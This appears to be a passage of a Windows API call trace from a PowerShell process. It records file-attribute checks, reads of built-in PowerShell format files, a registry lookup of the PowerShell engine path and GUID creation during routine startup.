	[0333.077] SetErrorMode (uMode=0x1) returned 0x1
	[0333.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0333.077] SetErrorMode (uMode=0x1) returned 0x1
	[0333.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.077] SetErrorMode (uMode=0x1) returned 0x1
	[0333.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0333.077] SetErrorMode (uMode=0x1) returned 0x1
	[0333.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.078] SetErrorMode (uMode=0x1) returned 0x1
	[0333.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0333.078] SetErrorMode (uMode=0x1) returned 0x1
	[0333.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0333.078] SetErrorMode (uMode=0x1) returned 0x1
	[0333.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0333.078] SetErrorMode (uMode=0x1) returned 0x1
	[0333.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0333.078] SetErrorMode (uMode=0x1) returned 0x1
	[0333.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0333.079] SetErrorMode (uMode=0x1) returned 0x1
	[0333.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0333.079] SetErrorMode (uMode=0x1) returned 0x1
	[0333.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0333.079] SetErrorMode (uMode=0x1) returned 0x1
	[0333.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0333.079] SetErrorMode (uMode=0x1) returned 0x1
	[0333.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0333.079] SetErrorMode (uMode=0x1) returned 0x1
	[0333.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0333.080] SetErrorMode (uMode=0x1) returned 0x1
	[0333.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0333.080] SetErrorMode (uMode=0x1) returned 0x1
	[0333.080] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0333.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.080] CoTaskMemFree (pv=0xffff0) 
	[0333.082] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0333.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.082] CoTaskMemFree (pv=0xffff0) 
	[0333.083] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0333.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.083] CoTaskMemFree (pv=0xffff0) 
	[0333.083] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0333.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.083] CoTaskMemFree (pv=0xffff0) 
	[0333.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.083] SetErrorMode (uMode=0x1) returned 0x1
	[0333.084] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0333.084] GetFileType (hFile=0x308) returned 0x1
	[0333.084] SetErrorMode (uMode=0x1) returned 0x1
	[0333.084] GetFileType (hFile=0x308) returned 0x1
	[0333.084] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0333.085] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0333.085] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0333.085] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0333.086] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0333.086] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0333.086] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x9e2, lpOverlapped=0x0) returned 1
	[0333.086] ReadFile (in: hFile=0x308, lpBuffer=0x344844a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x344844a*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0333.086] ReadFile (in: hFile=0x308, lpBuffer=0x3448f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3448f00*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0333.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.086] SetErrorMode (uMode=0x1) returned 0x1
	[0333.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0333.087] SetErrorMode (uMode=0x1) returned 0x1
	[0333.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.087] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x308) returned 0x0
	[0333.087] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0333.087] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ff3b0
	[0333.087] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x1b8ff3b0, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0333.087] CoTaskMemFree (pv=0x1b8ff3b0) 
	[0333.087] RegCloseKey (hKey=0x308) returned 0x0
	[0333.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.090] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd50fba10, Data2=0x6f2b, Data3=0x4b46, Data4=([0]=0xa6, [1]=0x4a, [2]=0x1f, [3]=0xd9, [4]=0xcb, [5]=0x72, [6]=0x39, [7]=0x8b))) returned 0x0
	[0334.073] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4033487, Data2=0xf23b, Data3=0x4d3f, Data4=([0]=0xb0, [1]=0xd3, [2]=0x3b, [3]=0x8a, [4]=0xd3, [5]=0xb7, [6]=0xee, [7]=0xf9))) returned 0x0
	[0334.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0334.076] SetErrorMode (uMode=0x1) returned 0x1
	[0334.076] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0334.076] GetFileType (hFile=0x308) returned 0x1
	[0334.076] SetErrorMode (uMode=0x1) returned 0x1
	[0334.076] GetFileType (hFile=0x308) returned 0x1
	[0334.076] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.077] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.078] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.078] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.078] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.079] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0xfb2, lpOverlapped=0x0) returned 1
	[0334.079] ReadFile (in: hFile=0x308, lpBuffer=0x3473182, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473182*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0334.079] ReadFile (in: hFile=0x308, lpBuffer=0x3473a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3473a68*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0334.080] CloseHandle (hObject=0x308) returned 1
	[0334.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0334.080] SetErrorMode (uMode=0x1) returned 0x1
	[0334.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0334.080] SetErrorMode (uMode=0x1) returned 0x1
	[0334.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0334.080] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x308) returned 0x0
	[0334.080] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0334.080] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ff180
	[0334.080] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x1b8ff180, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0334.080] CoTaskMemFree (pv=0x1b8ff180) 
	[0334.081] RegCloseKey (hKey=0x308) returned 0x0
	[0334.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0334.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0334.082] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x67f5a652, Data2=0x6326, Data3=0x4a28, Data4=([0]=0x8f, [1]=0xfb, [2]=0x77, [3]=0xf2, [4]=0xd6, [5]=0x6c, [6]=0xa0, [7]=0xb0))) returned 0x0
	[0334.087] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc1b9a781, Data2=0x14af, Data3=0x48ac, Data4=([0]=0xb4, [1]=0xc8, [2]=0xa9, [3]=0xb3, [4]=0xee, [5]=0x2e, [6]=0xcf, [7]=0xcb))) returned 0x0
	[0334.088] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xe2ff383, Data2=0xf6da, Data3=0x4339, Data4=([0]=0x9e, [1]=0x13, [2]=0x4f, [3]=0x3c, [4]=0xdf, [5]=0x89, [6]=0x98, [7]=0x64))) returned 0x0
	[0334.088] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xcea611d, Data2=0x16db, Data3=0x41c1, Data4=([0]=0xb2, [1]=0xe7, [2]=0x86, [3]=0xb7, [4]=0x2a, [5]=0x80, [6]=0xc3, [7]=0xf0))) returned 0x0
	[0334.088] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xbe70c28f, Data2=0x4e2c, Data3=0x4814, Data4=([0]=0xb6, [1]=0xb9, [2]=0xc4, [3]=0xa8, [4]=0x21, [5]=0x9, [6]=0x73, [7]=0x9e))) returned 0x0
	[0334.088] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xbc460213, Data2=0x1a7f, Data3=0x4d0e, Data4=([0]=0xb1, [1]=0x9d, [2]=0x67, [3]=0x2a, [4]=0x59, [5]=0x63, [6]=0x16, [7]=0x6c))) returned 0x0
	[0334.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0334.089] SetErrorMode (uMode=0x1) returned 0x1
	[0334.089] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0334.089] GetFileType (hFile=0x308) returned 0x1
	[0334.089] SetErrorMode (uMode=0x1) returned 0x1
	[0334.089] GetFileType (hFile=0x308) returned 0x1
	[0334.089] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.090] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.091] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.091] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.092] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0334.092] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
